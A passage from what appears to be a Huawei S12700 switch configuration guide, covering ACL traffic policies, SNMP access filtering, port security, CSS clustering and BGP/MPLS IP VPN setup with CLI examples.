Behavior: b_network
Permit

#

-------------------------------------------------
Policy Name:
p_network
Policy Index:
0
Classifier:c_network
Behavior:b_network
-------------------------------------------------
traffic-policy p_network
outbound
slot 2 :
success
-------------------------------------------------

1.
# External hosts cannot access the financial server.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20 30 100
#
acl number 3002
rule 5 permit ip source 10.164.1.0 0.0.0.255 destination 10.164.4.4 0
#
traffic classifier c_network operator or precedence 5
if-match acl 3002
#
traffic behavior b_network
permit
#
traffic policy p_network match-order config
classifier c_network behavior b_network
#
interface Vlanif10
ip address 10.164.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.164.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.164.3.1 255.255.255.0
#
interface Vlanif100
ip address 10.164.4.1 255.255.255.0

#
#
#
#
traffic-policy p_network outbound
#
return
12.1.9 Example for Applying ACLs to SNMP to Filter NMSs
ACL Overview
In this example, a basic ACL is applied to the SNMP module so that only the specified NMS
can access the switch. This improves switch security.
Configuration Notes
As shown in Figure 12-9, a new switch is added to an enterprise's network, and uses
SNMPv1 to communicate with the NMS. To improve switch security, the switch can only be
managed by the existing NMS on the network.
Figure 12-9 Applying basic ACLs to SNMP to filter NMSs

GE1/0/1
10.1.1.1/24 VLAN10
10.1.1.2/24
NMS Switch

1. Configure SNMPv1 on the switch so that the NMS running SNMPv1 can manage the
switch.
2. Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
3. Configure a community name based on which the switch permits access of the NMS.
4. Configure a trap host and enable the switch to automatically send traps to the NMS.
5. Add the switch to the NMS. The community name configured on the switch must be the
same as that used by the NMS; otherwise, the NMS cannot manage the switch.
Procedure
Step 1 Configure SNMPv1 on the switch so that the NMS running SNMPv1 can manage the switch.
[Switch] snmp-agent sys-info version v1 //By default, SNMPv3 is supported.
Step 2 Configure access control so that only the NMS with the specified IP address can perform
# Configure an ACL to permit only the NMS 10.1.1.1 to access the switch.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.1 0 //Allow only the NMS with
IP address 10.1.1.1 to access the device.
[Switch-acl-basic-2001] rule deny
# Configure the MIB view to specify the MIB objects that can be accessed by the NMS.
[Switch] snmp-agent mib-view included isoview iso //Specify that the accessible
MIB view contains iso.
Step 3 Configure a community name based on which the switch permits access of the NMS.
[Switch] snmp-agent community write adminnms01 mib-view isoview acl 2001 //
Configure a community name and apply the ACL to make the access control function
take effect.
Step 4 Configure a trap host and enable the switch to automatically send traps to the NMS.
[Switch] snmp-agent trap enable
Warning: All switches of SNMP trap/notification will be open. Continue? [Y/N]:y //
Enable all trap functions on the switch. By default, only some trap functions are
enabled. You can run the display snmp-agent trap all command to check trap status.
[Switch] snmp-agent target-host trap address udp-domain 10.1.1.1 params
securityname adminnms01 v1 //Configure a trap host. By default, traps are sent by
UDP port 162.
Step 5 Add the switch to the NMS.

Configure the SNMP function on the NMS according to the NMS manual, including setting
the SNMP version to SNMPv1, the read/write community name to adminnms01, and the
SNMP connection port number to 161 (default port used by the switch). In addition, set the
trap receiving port to port 162 (default port used by the switch) so that the NMS can receive
traps.
After the configurations are complete, the NMS can manage the switch and the switch can
automatically send traps to the NMS when events occur.

NOTE
The parameter settings on the NMS must be the same as those on the switch; otherwise, the NMS cannot
manage the switch.
----End
Configuration Files
#
sysname Switch
#
acl number 2001
rule 10 deny
#
snmp-agent
snmp-agent local-engineid 800007DB03360102101100
snmp-agent community write cipher %^%#.T|&Whvyf$<Gd"I,wXi5SP_6~Nakk6<<+3H:N-
h@aJ6d,l0md%HCeAY8~>X=>xV\JKNAL=124r839v<*%^%# mib-view isoview acl 2001
snmp-agent sys-info version v1 v3
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname
cipher %^%#uq/!YZfvW4*vf[~C|.:Cl}UqS(vXd#wwqR~5M(rU%%^%#
snmp-agent mib-view included isoview iso
snmp-agent trap enable
#
return
12.2 Example for Configuring Port Security

Port Security Overview
Port security changes the dynamic MAC addresses learned on an interface into secure MAC
addresses (including dynamic and static secure MAC addresses, and sticky MAC addresses).
This function prevents unauthorized users from communicating with the switch using this
interface. Generally, port security is configured on access devices to bind users to interfaces
and control access users on interfaces.
Compared with the static MAC address entry and user-bind used to bind users statically, port
security dynamically binds users to interfaces.
Compared with DHCP snooping that also dynamically binds users to interface, port security is
easier to configure. In addition, port security can limit the number of access users.
Configuration Notes
l After MAC address limiting is configured on an interface, port security cannot be
configured on the interface.
As shown in Figure 12-10, PC1, PC2, and PC3 connect to the company network through the
switch. To improve user access security, port security is enabled on the interface of the switch
so that external users cannot use their PCs to access the company network.

Figure 12-10 Networking for configuring port security
In t r a n e t
S w it c h A
S w it c h
G E 1 /0 /1 G E 1 /0 /3
G E 1 /0 /2
VLAN 10
PC1 PC2 PC3
1. Create a VLAN to implement Layer 2 forwarding.
2. Configure port security and enable the sticky MAC function so that MAC address entries
are not lost after the device configuration is saved and the device restarts.
Procedure
Step 1 Create a VLAN on the switch and add interfaces to the VLAN. The configurations of GE1/0/2
and GE1/0/3 are similar to the configuration of 1/0/1, and are not mentioned here.
[Switch] vlan 10 //Create VLAN 10.
[Switch-GigabitEthernet1/0/1] port link-type access //The link type of the
interface connected to the PC must be access. The default link type of an
interface is not access, so you need to manually configure the link type of the
interface.
Step 2 Configure port security on GE1/0/1. The configurations of GE1/0/2 and GE1/0/3 are similar
to the configuration of GE1/0/1, and are not mentioned here.
[Switch-GigabitEthernet1/0/1] port-security enable //Enable port security.
[Switch-GigabitEthernet1/0/1] port-security mac-address sticky //The sticky MAC
function can be enabled only after port security is enabled.
[Switch-GigabitEthernet1/0/1] port-security max-mac-num 1 //After port security
is enabled, an interface can learn only one secure MAC address entry by default.
If one user needs to be limited, ignore this configuration.
NOTE
l An interface can learn only one secure MAC address entry by default. If multiple PCs connect to the
company network using one interface, run the port-security max-mac-num command to change the
maximum number of secure MAC addresses.
l If a PC connects to the switch using an IP phone, set the maximum number of secure MAC
addresses to 3 because the IP phone occupies two MAC address entries and the PC occupies one
MAC address entry. The VLAN IDs in two MAC address entries used by the IP phone are different.
The two VLANs are used to transmit voice and data packets respectively.


If PC1, PC2, and PC3 are replaced by other PCs, the PCs cannot access the company network.
----End
Configuration Files
#
sysname Switch
#
vlan batch 10
#
port-security enable
port-security mac-address sticky
#
#
#
return

Typical Configuration Examples 13 Typical CSS Configuration of Modular Switches
13 Typical CSS Configuration of Modular

Switches
About This Chapter
13.1 Example for Setting Up a CSS

13.1 Example for Setting Up a CSS
CSS Overview
A cluster switch system (CSS), also called a cluster, is a logical switch consisting of two
clustering-capable switches. In addition to high forwarding performance, CSS technology
provides high reliability and scalability on a network, while simplifying network
management.
l High reliability: Member switches in a CSS work in redundancy mode. Link redundancy
can also be implemented between member switches through link aggregation.
l High scalability: Switches can set up a CSS to increase the number of ports, bandwidth,
and packet processing capabilities.
l Simplified configuration and management: After two switches set up a CSS, they are
virtualized into one device. You can log in to the CSS from either member switch to
configure and manage the entire CSS.
S12700s set up a CSS using CSS cards in SFUs. In this connection mode, member switches
are connected using dedicated CSS cards in SFUs and cluster cables. This technology is
called Cluster Switch System Generation 2 (CSS2). In addition to the existing CSS features,
CSS2 supports 1+N backup of MPUs.
1+N backup of MPUs enables a CSS to run stably as long as one MPU of any chassis in the
CSS is working normally. Compared with the service port connection mode in which each
chassis must have at least one MPU working normally, CSS2 is more reliable. Compared with
the MPU-mounted CSS card connection mode in which each chassis must have two MPUs
installed, CSS2 is more flexible.
After a CSS is set up, you are advised to perform the following configurations:
l To simplify network configuration, increase uplink bandwidth, and improve reliability,
configure inter-device Eth-Trunks in the CSS, connect downstream devices to the CSS in
dual-homing mode, and add uplink and downlink ports of the CSS to the Eth-Trunks.
l Configure the multi-active detection (MAD) function in the CSS. Two member switches
in a CSS use the same IP address and MAC address (CSS system MAC address).
Therefore, after the CSS splits, two CSSs may use the same IP address and MAC
address. To prevent this situation, a mechanism is required to check for IP address and
MAC address collision after a split. MAD is a CSS split detection protocol. When a CSS
splits due to a link failure, MAD provides split detection, multi-active handling, and fault
recovery mechanisms to minimize the impact of a CSS split on services.
MAD can be implemented in direct or relay mode. The direct and relay modes cannot be
configured simultaneously in a CSS. You can configure MAD in relay mode for a CSS
when an inter-device Eth-Trunk is configured in the CSS. The direct mode occupies
additional ports, and these ports can only be used for MAD after being connected using
common cables. Compared with the direct mode, the relay mode does not occupy
additional ports.
Software and Hardware Requirements

Table 13-1 lists software and hardware requirements on the S12700 clustering.

Table 13-1 Software and hardware requirements

Device l S12708 S12704
Model l S12712
Software V200R005C00 and later versions V200R008C00 and later versions

Version
Whether a No
License Is
Required
CSS Card EH1D2VS08000

Model
CSS Card l Subcard slot in the ET1D2SFUA000 (applicable to S12704/S12708/

Slot S12712)
l Subcard slot in the ET1D2SFUC000 (applicable to S12704/S12708)
l Subcard slot in the ET1D2SFUD000 (applicable to S12708/S12712)
Hot Swap l CSS card: hot swappable

l SFU: hot swappable
Hardware l Two member switches of the same or different models can form a CSS.
Configurati For example, two S12704s can form a CSS; one S12708 and one
on S12712 can form a CSS.
l Each chassis must have at least one MPU and one SFU installed. You
are advised to install at least two SFUs and two CSS cards in each
chassis. (An S12704 can have a maximum of two SFUs and two CSS
cards installed.)
l The SFUs in one chassis must be of the same model. The SFUs in two
chassis can be of different models; however, the same model is
recommended.
Pluggable Electrical cable:

Modules l 1 m SFP+ high-speed cable
for Ports on
CSS Cards l 3 m SFP+ high-speed cable
l 10 m SFP+ active high-speed cable
Optical module and fiber:
10G SFP+ optical module. The required optical fiber depends on the optical
module used, and the maximum transmission distance is 80 km.
Active optical cable:
l SFP-10G-A0C3M
l SFP-10G-A0C10M
An enterprise needs to build a network has a reliable core layer and simple structure to
facilitate configuration and management.
To meet requirements of the enterprise, S12708 core switches SwitchA and SwitchB set up a
CSS using CSS cards in SFUs. SwitchA is the master switch, and SwitchB is the standby

switch. Figure 13-1 shows the network topology. Aggregation switches connect to the CSS
through Eth-Trunks, and the CSS connects to the upstream network through an Eth-Trunk.
Figure 13-1 Setting up a CSS
Network
SwitchE
GE1/0/1 GE1/0/2
Eth-Trunk 10
GE1/1/0/4 CSS GE2/1/0/4
Core layer SwitchA SwitchB

GE /5
GE1/1/0/3
1 /1/0 /1/0
/5 G E2 GE2/1/0/3
GE1/0/2 GE1/0/2
Aggregation SwitchC GE1/0/1 GE1/0/1 SwitchD
layer
CSS Link
Eth-Trunk
1. Install CSS cards on SwitchA and SwitchB, and connect cluster cables.
2. Set the CSS connection mode on SwitchA and SwitchB and set their CSS IDs to 1 and 2
and CSS priorities to 100 and 10 respectively. These configurations ensure that SwitchA
has a higher probability to become the master switch.
3. Enable the CSS function on SwitchA and then on SwitchB to ensure that SwitchA
becomes the master switch.
4. Check whether a CSS is set up successfully.
5. Configure uplink and downlink Eth-Trunks for the CSS to improve forwarding
bandwidth and reliability.
6. Configure MAD to minimize the impact of a CSS split on the network.

Procedure
Step 1 Install hardware modules.
The following describes only the rule for connecting cluster cables between two member
switches. If you also need to install MPUs and CSS cards and learn about installation details,
see the Switch Cluster Setup Guide.
Connect cables according to the connection rules. Figure 13-2 shows the connection rules of
EH1D2VS08000 CSS cards (on the S12708). The connection rules of CSS cards on the
S12712 or S12704 are the same as those on the S12708.
Figure 13-2 EH1D2VS08000 connection rule

S12708 S12708
S12700 S12700
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
ID 2 ID 2
CLK1 CLK2 CLK1 CLK2
CSS
USB SYNC
RST
ACT RUN/ALM
10 CSS
USB SYNC
RST
ACT RUN/ALM
10
MASTER MASTER
S12700 S12700
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
ID 2 ID 2
CLK2
09
CLK2
09
CLK1 CLK1
CSS CSS
RST RST
USB SYNC ACT RUN/ALM USB SYNC ACT RUN/ALM
MASTER MASTER
S12700 RUN/ALM S12700 RUN/ALM
08 08
07 07
06 06
05 05
S12700 SFUD S12700 SFUD

RUN/ALM RUN/ALM
14 14
LINK/ALM OFL RUN/ALM LINK/ALM OFL RUN/ALM
MASTER MASTER
ET1D2
1 2 3 4 5 6 7 8
ET1D2
1 2 3 4 5 6 7 8
ET1D2
ET1D2
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
SFUD000
SFUD000
SFUD000
SFUD000
VS08 VS08

RUN/ALM RUN/ALM
13 13
MASTER MASTER
ET1D2
1 2 3 4 5 6 7 8
ET1D2
1 2 3 4 5 6 7 8
ET1D2
ET1D2
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
SFUD000
SFUD000
SFUD000
SFUD000
VS08 VS08

RUN/ALM RUN/ALM
12 12
MASTER MASTER
ET1D2
1 2 3 4 5 6 7 8
ET1D2
1 2 3 4 5 6 7 8
ET1D2
ET1D2
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
SFUD000
SFUD000
SFUD000
SFUD000
VS08 VS08

RUN/ALM RUN/ALM
LINK/ALM LINK/ALM
11 11
OFL RUN/ALM OFL RUN/ALM
MASTER MASTER
ET1D2
1 2 3 4 5 6 7 8
ET1D2
1 2 3 4 5 6 7 8
ET1D2
ET1D2
1 2 3 4 5 6 7 8 1 2 3 4 5 6 7 8
SFUD000
SFUD000
SFUD000
SFUD000
VS08 VS08
04 04
03 03
02 02
01 01
INPUT INPUT INPUT INPUT INPUT INPUT INPUT INPUT INPUT INPUT INPUT INPUT
OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT OUTPUT
ALARM ALARM ALARM ALARM ALARM ALARM ALARM ALARM ALARM ALARM ALARM ALARM
Group 1 Group 2 Cluster cables
NOTE
l One CSS card can only be connected to one CSS card in the other chassis but not the local chassis.
l A port in group 1 of a CSS card can be connected to any port in group 1 of the CSS card on the other
chassis. The requirements for ports in group 2 are the same.
l The two chassis must be connected by one cluster cable at least.
l It is recommended that you connect the same number of cluster cables to the CSS cards (if not, the
total cluster bandwidth will be affected) and connect CSS ports on the two member switches based
on port numbers.
l If the SFU model used in the member switches is ET1D2SFUD000, it is recommended that the
number of cluster cables connected to each CSS card be an even number.
Step 2 Configure the CSS connection mode, CSS ID, and CSS priority.
# Configure the CSS function on SwitchA. Retain the default CSS connection mode (CSS
card connection) and the default CSS ID 1, and set the CSS priority to 100.
[SwitchA] set css priority 100
# Configure the CSS function on SwitchB. Retain the default CSS connection mode (CSS
card connection), and set the CSS ID to 2 and CSS priority to 10.

[SwitchB] set css id 2
[SwitchB] set css priority 10
# Check the CSS configuration.
NOTE
After the configuration is complete, run the display css status saved command to check the CSS
configuration.
Check the CSS configuration on SwitchA.

[SwitchA] display css status saved
Current Id Saved Id CSS Enable CSS Mode Priority Master force
------------------------------------------------------------------------------
1 1 Off CSS card 100 Off
Check the CSS configuration on SwitchB.

[SwitchB] display css status saved
Current Id Saved Id CSS Enable CSS Mode Priority Master force
------------------------------------------------------------------------------
1 2 Off CSS card 10 Off
Step 3 Enable the CSS function.

# Enable the CSS function on SwitchA and restart SwitchA.
[SwitchA] css enable
Warning: The CSS configuration will take effect only after the system is
rebooted. T
he next CSS mode is CSS card. Reboot now? [Y/N]:y
# Enable the CSS function on SwitchB and restart SwitchB.

[SwitchB] css enable
Warning: The CSS configuration will take effect only after the system is
rebooted. T
he next CSS mode is CSS card. Reboot now? [Y/N]:y
Step 4 Check whether a CSS is set up successfully.

# View the indicator status.
The CSS MASTER indicator on an MPU of SwitchA is steady on, indicating that the MPU is
the active MPU of the CSS and SwitchA is the master switch.
The CSS MASTER indicator on an MPU of SwitchB is off, indicating that SwitchB is the
standby switch.
# Log in to the CSS through the console port on any MPU to check whether the CSS has been
set up successfully.
<SwitchA> display device
Chassis 1 (Master Switch)
-------------------------------------------------------------------------------
5 - ET1D2G48SEC0 Present PowerOn Registered Normal NA
7 - ET1D2X16SSC0 Present PowerOn Registered Normal NA
9 - ET1D2MPUA000 Present PowerOn Registered Normal Slave
10 - ET1D2MPUA000 Present PowerOn Registered Normal Master
11 - ET1D2SFUD000 Present PowerOn Registered Normal NA
1 EH1D2VS08000 Present PowerOn Registered Normal NA


CMU2 - EH1D200CMU00 Present PowerOn Registered Normal Master
Chassis 2 (Standby Switch)
-------------------------------------------------------------------------------
3 - ET1D2G48SEC0 Present PowerOn Registered Normal NA
4 - ET1D2X16SSC0 Present PowerOn Registered Normal NA
9 - ET1D2MPUA000 Present PowerOn Registered Normal Slave
10 - ET1D2MPUA000 Present PowerOn Registered Normal Master
CMU1 - EH1D200CMU00 Present PowerOn Registered Normal Master
<SwitchA> display css status
CSS Enable switch On
Chassis Id CSS Enable CSS Status CSS Mode Priority Master Force
------------------------------------------------------------------------------
1 On Master CSS card 100 Off
2 On Standby CSS card 10 Off
The command output shows the card status and CSS status of both member switches,
indicating that the CSS has been set up successfully.
# Check whether CSS links are normal.
<SwitchA> display css channel
Chassis 1 || Chassis 2
--------------------------------------------------------------------------------
Num [Port] [Speed] || [Speed] [Port]
1 1/11/0/1 10G 10G 2/11/0/1
2 1/11/0/2 10G 10G 2/11/0/2
3 1/11/0/3 10G 10G 2/11/0/3
4 1/11/0/4 10G 10G 2/11/0/4
5 1/11/0/5 10G 10G 2/11/0/5
6 1/11/0/6 10G 10G 2/11/0/6
7 1/11/0/7 10G 10G 2/11/0/7
8 1/11/0/8 10G 10G 2/11/0/8
9 1/12/0/1 10G 10G 2/12/0/1
10 1/12/0/2 10G 10G 2/12/0/2
11 1/12/0/3 10G 10G 2/12/0/3
12 1/12/0/4 10G 10G 2/12/0/4
13 1/12/0/5 10G 10G 2/12/0/5
14 1/12/0/6 10G 10G 2/12/0/6
15 1/12/0/7 10G 10G 2/12/0/7
16 1/12/0/8 10G 10G 2/12/0/8
17 1/13/0/1 10G 10G 2/13/0/1
18 1/13/0/2 10G 10G 2/13/0/2
19 1/13/0/3 10G 10G 2/13/0/3

20 1/13/0/4 10G 10G 2/13/0/4

21 1/13/0/5 10G 10G 2/13/0/5
22 1/13/0/6 10G 10G 2/13/0/6
23 1/13/0/7 10G 10G 2/13/0/7
24 1/13/0/8 10G 10G 2/13/0/8
25 1/14/0/1 10G 10G 2/14/0/1
26 1/14/0/2 10G 10G 2/14/0/2
27 1/14/0/3 10G 10G 2/14/0/3
28 1/14/0/4 10G 10G 2/14/0/4
29 1/14/0/5 10G 10G 2/14/0/5
30 1/14/0/6 10G 10G 2/14/0/6
31 1/14/0/7 10G 10G 2/14/0/7
32 1/14/0/8 10G 10G 2/14/0/8
--------------------------------------------------------------------------------
The command output shows that all the CSS links are working normally, indicating that the
CSS has been set up successfully.
Step 5 Configure Eth-Trunks between the CSS and its upstream and downstream devices.
# Configure an Eth-Trunk in the CSS and add uplink ports to the Eth-Trunk.
[SwitchA] sysname CSS //Rename the CSS.
# Configure an Eth-Trunk in the CSS and add the downlink ports connected to SwitchC to the
Eth-Trunk.
# Configure an Eth-Trunk in the CSS and add the downlink ports connected to SwitchD to the
Eth-Trunk.
[CSS-GigabitEthernet2/1/0/3] return
# Configure an Eth-Trunk on SwitchE and add member ports to the Eth-Trunk.

[HUAWEI] sysname SwitchE
[SwitchE] interface eth-trunk 10
[SwitchE-Eth-Trunk10] quit
[SwitchE] interface gigabitethernet 1/0/1
[SwitchE-GigabitEthernet1/0/1] eth-trunk 10
[SwitchE-GigabitEthernet1/0/1] quit
[SwitchE] interface gigabitethernet 1/0/2
[SwitchE-GigabitEthernet1/0/2] eth-trunk 10
[SwitchE-GigabitEthernet1/0/2] quit

# Configure an Eth-Trunk on SwitchC and add member ports to the Eth-Trunk.

[SwitchC] interface eth-trunk 20
[SwitchC-GigabitEthernet1/0/1] eth-trunk 20
[SwitchC-GigabitEthernet1/0/2] eth-trunk 20
# Configure an Eth-Trunk on SwitchD and add member ports to the Eth-Trunk.

[SwitchD] interface eth-trunk 30
[SwitchD-Eth-Trunk30] quit
[SwitchD-GigabitEthernet1/0/1] eth-trunk 30
[SwitchD-GigabitEthernet1/0/2] eth-trunk 30

After the configuration is complete, run the display trunkmembership eth-trunk command
in any view to check information about Eth-Trunk member ports. For example:
The command output shows information about member ports in Eth-Trunk 10.
<CSS> display trunkmembership eth-trunk 10
Trunk ID: 10
Used status: VALID
TYPE: ethernet
Working Mode : Normal
Number Of Ports in Trunk = 2
Number Of Up Ports in Trunk = 2
Operate status: up

Step 6 Configure the MAD function. The following procedure configures MAD in relay mode and
configures SwitchC as the relay agent.
# In the CSS, configure MAD in relay mode for the inter-device Eth-Trunk.
<CSS> system-view
[CSS-Eth-Trunk20] mad detect mode relay
[CSS] quit
# Configure the MAD proxy function on SwitchC.

[SwitchC] interface eth-trunk 20
[SwitchC-Eth-Trunk20] mad relay
[SwitchC] quit

Check the MAD configuration in the CSS.
<CSS> display mad
Current MAD domain: 0

MAD direct detection enabled: NO

MAD relay detection enabled: YES
Check MAD proxy information on SwitchC.

<SwitchC> display mad proxy
Mad relay interfaces configured:
Eth-Trunk20
----End
Configuration Files
l CSS configuration file
#
sysname CSS
#
#
mad detect mode relay
#
#
eth-trunk 20
#
eth-trunk 10
#
eth-trunk 30
#
eth-trunk 30
#
eth-trunk 10
#
eth-trunk 20
#
return

#
sysname SwitchC
#
mad relay
#
eth-trunk 20
#
eth-trunk 20
#
return

#
sysname SwitchD
#
#
eth-trunk 30
#

eth-trunk 30
#
return
l SwitchE configuration file

#
sysname SwitchE
#
#
eth-trunk 10
#
eth-trunk 10
#
return
Related Content
Tool
CSS Assistant

Typical Configuration Examples 14 Typical MPLS&VPN Configuration
14 Typical MPLS&VPN Configuration
About This Chapter
14.1 Typical BGP/MPLS IP VPN Configuration

14.2 Example for Connecting QinQ Termination Sub-interfaces to a VLL Network
14.3 Example for Deploying BGP/MPLS IP VPN and VPLS on One ISP Network

14.1 Typical BGP/MPLS IP VPN Configuration

14.1.1 Example for Configuring BGP/MPLS IP VPN
BGP/MPLS IP VPN Overview
BGP/MPLS IP VPN is an MPLS-based L3VPN and it can be flexibly deployed and easily
extended, suitable for large-sized deployment. When a new site is added, the network
administrator only needs to modify the configuration of the edge nodes serving the new site.
BGP/MPLS IP VPN is suitable for communication between the headquarters and branches in
different locations. As communication data needs to traverse the backbone network of the
carrier, BGP is used to advertise VPN routes and MPLS is used to forward VPN packets on
the backbone network. As different departments of an enterprise need to be isolated, BGP/
MPLS IP VPN can implement route isolation, address space isolation, and access isolation
between different VPNs.
Configuration Notes
l The SA series cards do not support the BGP/MPLS IP VPN function. The X1E series
cards of V200R006C00 and later versions support the BGP/MPLS IP VPN function.
l This example applies to all versions of the S12700 switches.
NOTE
As shown in Figure 14-1:
l CE1 connects to the headquarters R&D area of a company, and CE3 connects to the
branch R&D area. CE1 and CE3 belong to vpna.
l CE2 connects to the headquarters non-R&D area, and CE4 connects to the branch non-
R&D area. CE2 and CE4 belong to vpnb.
BGP/MPLS IP VPN needs to be deployed for the company to ensure secure communication
between the headquarters and branch while isolating data between the R&D area and non-
R&D area.

Figure 14-1 Networking diagram for configuring BGP/MPLS IP VPN
AS: 65410 AS: 65430

vpna vpna
CE1 CE3
GE1/0/0 GE1/0/0
VLANIF10 VLANIF40
10.1.1.1/24 10.3.1.1/24
Loopback1
GE1/0/0 2.2.2.9/32 GE1/0/0
VLANIF10 GE1/0/0 GE2/0/0 VLANIF40
10.1.1.2/24 VLANIF30 VLANIF60 10.3.1.2/24
PE1 PE2
Loopback1 172.1.1.2/24 172.2.1.1/24 Loopback1
1.1.1.9/32 GE3/0/0 3.3.3.9/32
GE3/0/0
GE2/0/0 VLANIF30 P VLANIF60 GE2/0/0
VLANIF20 172.1.1.1/24 172.2.1.2/24 VLANIF50
AS: 100
10.2.1.2/24 10.4.1.2/24
VPN Backbone
GE1/0/0 GE1/0/0
VLANIF20 VLANIF50
10.2.1.1/24 10.4.1.1/24
CE2 CE4
vpnb vpnb
AS: 65420 AS: 65440
1. Configure OSPF between the P and PEs to ensure IP connectivity on the backbone
network.
2. Configure basic MPLS capabilities and MPLS LDP on the P and PEs to establish MPLS
LSP tunnels for VPN data transmission on the backbone network.
3. Configure MP-IBGP on PE1 and PE2 to enable them to exchange VPN routing
information.
4. Configure VPN instances vpna and vpnb on PE1 and PE2. Set the VPN target of vpna to
111:1 and the VPN target of vpnb to 222:2. This configuration allows users in the same
VPN to communicate with each other and isolates users on different VPNs. Bind the PE
interfaces connected to CEs to the corresponding VPN instances to provide access for
VPN users.
5. Configure EBGP on the CEs and PEs to exchange VPN routing information.
Procedure
Step 1 Configure an IGP on the MPLS backbone network so that PEs and P can communicate with
each other.
# Configure PE1.

[PE1] vlan batch 10 20 30
[PE1-Vlanif30] quit
[PE1] ospf 1 router-id 1.1.1.9
[PE1-ospf-1] area 0
[PE1-ospf-1] quit
# Configure P.
[HUAWEI] sysname P
[P] interface loopback 1
[P-LoopBack1] ip address 2.2.2.9 32
[P-LoopBack1] quit
[P] vlan batch 30 60
[P] interface gigabitethernet 1/0/0
[P-GigabitEthernet1/0/0] port link-type trunk
[P-GigabitEthernet1/0/0] port trunk allow-pass vlan 30
[P-GigabitEthernet1/0/0] quit
[P-GigabitEthernet2/0/0] port link-type trunk
[P-GigabitEthernet2/0/0] port trunk allow-pass vlan 60
[P] interface vlanif 30
[P-Vlanif30] ip address 172.1.1.2 24
[P-Vlanif30] quit
[P-Vlanif60] quit
[P] ospf 1 router-id 2.2.2.9
[P-ospf-1] area 0
[P-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[P-ospf-1-area-0.0.0.0] quit
[P-ospf-1] quit
# Configure PE2.
[PE2] vlan batch 40 50 60


[PE2-Vlanif60] quit
[PE2] ospf 1 router-id 3.3.3.9
[PE2-ospf-1] area 0
[PE2-ospf-1] quit
After the configuration is complete, OSPF neighbor relationships are established between PE1
and P, and between PE2 and P. Run the display ospf peer command. The command output
shows that the neighbor status is Full. Run the display ip routing-table command. The
command output shows that PEs have learned the routes to Loopback1 of each other.
The information displayed on PE1 is used as an example.
[PE1] display ip routing-table
------------------------------------------------------------------------------

2.2.2.9/32 OSPF 10 1 D 172.1.1.2 Vlanif30
3.3.3.9/32 OSPF 10 2 D 172.1.1.2 Vlanif30
172.1.1.0/24 Direct 0 0 D 172.1.1.1 Vlanif30
172.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
172.2.1.0/24 OSPF 10 2 D 172.1.1.2 Vlanif30
[PE1] display ospf peer

Neighbors

DR: 172.1.1.2 BDR: 172.1.1.1 MTU: 0
Step 2 Configure basic MPLS capabilities and MPLS LDP on the MPLS backbone network to
establish LDP LSPs.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.9
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1-Vlanif30] mpls
[PE1-Vlanif30] mpls ldp
[PE1-Vlanif30] quit

# Configure P.
[P] mpls lsr-id 2.2.2.9
[P] mpls
[P-mpls] quit
[P] mpls ldp
[P-mpls-ldp] quit
[P-Vlanif30] mpls
[P-Vlanif30] mpls ldp
[P-Vlanif30] quit
[P-Vlanif60] mpls
[P-Vlanif60] quit
# Configure PE2.
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2-Vlanif60] mpls
[PE2-Vlanif60] quit
After the configuration is complete, LDP sessions are established between PE1 and the P and
between the P and PE2. Run the display mpls ldp session command. The command output
shows that the Status field is Operational. Run the display mpls ldp lsp command.
Information about the established LDP LSPs is displayed.
[PE1] display mpls ldp session

------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[PE1] display mpls ldp lsp
LDP LSP Information

-------------------------------------------------------------------------------
Flag after Out IF: (I) - LSP Is Only Iterated by RLFA
-------------------------------------------------------------------------------
DestAddress/Mask In/OutLabel UpstreamPeer NextHop OutInterface
-------------------------------------------------------------------------------
1.1.1.9/32 3/NULL 2.2.2.9 127.0.0.1 InLoop0
*1.1.1.9/32 Liberal/1024 DS/2.2.2.9
2.2.2.9/32 NULL/3 - 172.1.1.2 Vlanif30
2.2.2.9/32 1024/3 2.2.2.9 172.1.1.2 Vlanif30
3.3.3.9/32 NULL/1025 - 172.1.1.2 Vlanif30
3.3.3.9/32 1025/1025 2.2.2.9 172.1.1.2 Vlanif30
-------------------------------------------------------------------------------
TOTAL: 5 Normal LSP(s) Found.
TOTAL: 1 Liberal LSP(s) Found.
TOTAL: 0 Frr LSP(s) Found.
A '*' before an LSP means the LSP is not established
A '*' before a Label means the USCB or DSCB is stale
A '*' before a UpstreamPeer means the session is stale
A '*' before a DS means the session is stale

A '*' before a NextHop means the LSP is FRR LSP
Step 3 Configure VPN instances on PEs and bind the interfaces connected to CEs to the VPN
instances.
# Configure PE1.
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] route-distinguisher 100:1
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE1-vpn-instance-vpna-af-ipv4] quit
[PE1-vpn-instance-vpna] quit
[PE1] ip vpn-instance vpnb
[PE1-vpn-instance-vpnb] route-distinguisher 100:2
[PE1-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE1-vpn-instance-vpnb-af-ipv4] quit
[PE1-vpn-instance-vpnb] quit
[PE1-Vlanif10] ip binding vpn-instance vpna
[PE1-Vlanif10] quit
[PE1-Vlanif20] ip binding vpn-instance vpnb
[PE1-Vlanif20] quit
# Configure PE2.
[PE2-Vlanif40] quit
[PE2-Vlanif50] quit
# Assign IP addresses to the interfaces on the CE1 connecting to the headquarters R&D area
according to Figure 14-1. The configuration procedure is not provided here. The
configuration on CE2, CE3, and CE4 is similar to the configuration on CE1 and is not
mentioned here.
